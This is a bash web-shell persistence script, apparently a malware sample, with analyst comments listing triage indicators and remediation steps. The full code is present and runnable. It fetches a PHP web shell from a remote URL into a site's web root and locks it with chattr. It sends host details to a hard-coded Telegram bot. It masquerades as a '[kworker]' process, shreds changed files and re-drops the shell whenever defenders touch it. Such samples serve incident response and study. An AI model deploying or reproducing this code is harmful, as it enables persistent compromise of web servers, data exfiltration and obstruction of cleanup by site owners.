#!/bin/bash
# ANALYST SUMMARY (listing re-flowed one statement per line; code tokens unchanged)
# This sample is a web-shell persistence watcher. As written it:
#   - redirects all of its output, including `set -x` trace, to a fixed log in /tmp
#   - downloads a PHP file from BACKUP_SHELL into the web root under a random
#     8-character name, sets mode 400 and, when running as root, the immutable flag
#   - reports host details and every dropped path to a Telegram bot
#   - launches a background bash whose argv[0] is "[kworker]" and which uses
#     inotifywait on WEB_SHELL_DIR to re-drop a file after any change
#   - deletes the executable behind PHP processes whose command line matches
#     a few substrings
# Triage artifacts visible in this listing: the LOG_FILE path, the BACKUP_SHELL
# URL, outbound requests to api.telegram.org, the bot token / chat id below,
# immutable read-only *.php files with 8-character alphanumeric names, and a
# user-space process named "[kworker]".
# Remediation order matters: stop the watcher and its inotifywait child before
# removing dropped files, and clear the immutable attribute (chattr -i) first.

# Logging
LOG_FILE="/tmp/anti_gedor.log"
# Everything the script prints from here on lands in LOG_FILE; with xtrace on,
# the log is expected to hold the expanded commands (dropped paths, notification
# requests), so collect it during triage.
exec > "$LOG_FILE" 2>&1
set -x

# Configuration - MAKE SURE THERE IS NO TRAILING SLASH
WEB_ROOT="/home/sekolahb/public_html" # No trailing slash
WEB_SHELL_DIR="$WEB_ROOT/shell" # Resolves to /home/sekolahb/public_html/shell
# Remote source of the PHP payload; the payload itself is not part of this listing.
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719"
# Hard-coded bot credential and destination chat: usable as indicators and for
# an abuse report to the platform.
TELEGRAM_BOT_TOKEN="7942393115:AAEriWlHhR0Y32kCHBZuYWj0ZcUvoW36MB0"
TELEGRAM_CHAT_ID="1345261884"

# Function: send a notification to Telegram
# $1 is the message text. The request is capped at 3 seconds and its output is
# discarded, so a failed send is silent.
send_telegram() {
    local message="$1"
    timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" > /dev/null 2>&1
}

# Function: startup notification
# Sends host name, first address from `hostname -I`, owner/group of WEB_ROOT and
# up to three *.php paths found under WEB_SHELL_DIR to the Telegram chat.
send_startup_notification() {
    local server_ip=$(hostname -I | awk '{print $1}')
    local server_name=$(hostname)
    local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}')
    # Check for shell files that already exist
    local existing_shells=$(find "$WEB_SHELL_DIR" -name "*.php" 2>/dev/null | head -3)
    local shell_info=""
    if [ -n "$existing_shells" ]; then
        shell_info="Existing Shells: $existing_shells"
    else
        shell_info="Status: Tidak ada shell yang ditemukan"
    fi
    send_telegram "🟢 ANTI GEDOR BOT AKTIF! Server: $server_name ($server_ip) Web Root: $WEB_ROOT Shell Dir: $WEB_SHELL_DIR Owner: $web_root_info $shell_info ✅ Sistem siap menghadapi serangan! Siapa berani hapus, langsung hilang duluan!🖕"
}

# Function: redeploy the shell
# Writes the downloaded payload into a randomly chosen first-level directory of
# WEB_ROOT and prints the resulting path on stdout.
deploy_shell() {
    # Get the list of directories that already exist in WEB_ROOT
    # (first level only; cgi-bin, error, icons and shell are excluded)
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    # Pick a random directory from the list
    local random_dir="${existing_dirs[0]}"
    # If no directory matches, use WEB_ROOT
    if [ -z "$random_dir" ]; then
        random_dir="$WEB_ROOT"
    fi
    # Generate a random shell file name (8 alphanumeric characters + .php)
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    # Download the shell from the URL
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    # Mode 400 plus the immutable attribute (root only) is a hunting signal:
    # `lsattr` under the web root shows the flag.
    chmod 400 "$new_shell_path"
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Function: deploy the initial shell (at startup)
# Drops a payload into WEB_SHELL_DIR only when no *.php file is found there;
# otherwise reports the existing one. Prints status text and the path on stdout.
deploy_initial_shell() {
    # Check whether a shell already exists in the target directory
    local existing_shell=$(find "$WEB_SHELL_DIR" -name "*.php" | head -1)
    if [ -z "$existing_shell" ]; then
        echo "Tidak ada shell yang ditemukan, mendeploy shell awal..."
        # Deploy the shell in the target directory
        local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
        local initial_shell_path="$WEB_SHELL_DIR/$shell_name"
        curl -s -o "$initial_shell_path" "$BACKUP_SHELL"
        chmod 400 "$initial_shell_path"
        if [ "$(id -u)" -eq 0 ]; then
            chattr +i "$initial_shell_path" 2>/dev/null
        fi
        send_telegram "🆕 INITIAL SHELL DEPLOYED: $initial_shell_path"
        echo "$initial_shell_path"
    else
        echo "Shell sudah ada: $existing_shell"
        send_telegram "✅ EXISTING SHELL FOUND: $existing_shell"
        echo "$existing_shell"
    fi
}

# Function: delete a "dangerous" file (the author's term for anything touched
# in the watched directory)
# $1 is the path. Tries rm first, then shred with overwrite-and-unlink if the
# file is still present; shredded files are not recoverable from disk.
delete_intruder() {
    local target="$1"
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
}

# Function: detect the "PHP attacker"
# Looks at up to ten PIDs whose command line contains "php". A process is
# selected when its command line contains "unlink", "delete" or "rm ", or when
# its executable path contains WEB_SHELL_DIR. The path that is then deleted is
# the target of /proc/<pid>/exe, i.e. the executable the process is running, so
# a missing PHP binary on an affected host can be a side effect of this sample.
detect_and_delete_php_attacker() {
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}

# Main script
echo "Memulai script..."
echo "WEB_ROOT: $WEB_ROOT"
echo "WEB_SHELL_DIR: $WEB_SHELL_DIR"
# Clean the path (remove double slashes)
WEB_SHELL_DIR=$(echo "$WEB_SHELL_DIR" | sed 's|//|/|g')
echo "WEB_SHELL_DIR (cleaned): $WEB_SHELL_DIR"
# Create the target directory
mkdir -p "$WEB_SHELL_DIR"
echo "Direktori target: $WEB_SHELL_DIR"
# Deploy the initial shell
initial_shell=$(deploy_initial_shell)
# Send the startup notification
send_startup_notification
# Main loop with process disguise
# `exec -a "[kworker]"` sets argv[0] so process listings show a name that looks
# like a kernel worker thread. Genuine kernel threads are children of kthreadd
# (PID 2), have an empty /proc/<pid>/cmdline and no resolvable /proc/<pid>/exe;
# a "[kworker]" entry whose exe link points at bash, or that has an inotifywait
# child, does not fit that profile. The text handed to `bash -c` is reproduced
# verbatim below, including its original-language comments; confirm its runtime
# behaviour in an isolated sandbox rather than from the layout.
exec -a "[kworker]" bash -c '
# Definisikan ulang fungsi di dalam subshell
source /dev/stdin <<'EOF'
# Fungsi kirim notifikasi ke Telegram
send_telegram() {
    local message="$1"
    timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" > /dev/null 2>&1
}
# Fungsi deploy ulang shell
deploy_shell() {
    local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
    local random_dir="${existing_dirs[0]}"
    if [ -z "$random_dir" ]; then
        random_dir="$WEB_ROOT"
    fi
    local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    local new_shell_path="$random_dir/$shell_name"
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    chmod 400 "$new_shell_path"
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}
# Fungsi hapus file berbahaya
delete_intruder() {
    local target="$1"
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
}
# Fungsi deteksi PHP attacker
detect_and_delete_php_attacker() {
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    for pid in $php_processes; do
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}
EOF
# Monitor direktori
inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null |
while read file event
do
    [[ -d "$file" ]] && continue
    # Hapus file yang diotak-atik
    delete_intruder "$file"
    # Deteksi dan hapus balik PHP attacker
    attacker_file=$(detect_and_delete_php_attacker)
    # Deploy shell baru
    new_shell=$(deploy_shell)
    # Kirim notifikasi lengkap
    if [ -n "$attacker_file" ]; then
        send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. 
✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
    else
        send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
    fi
done
' &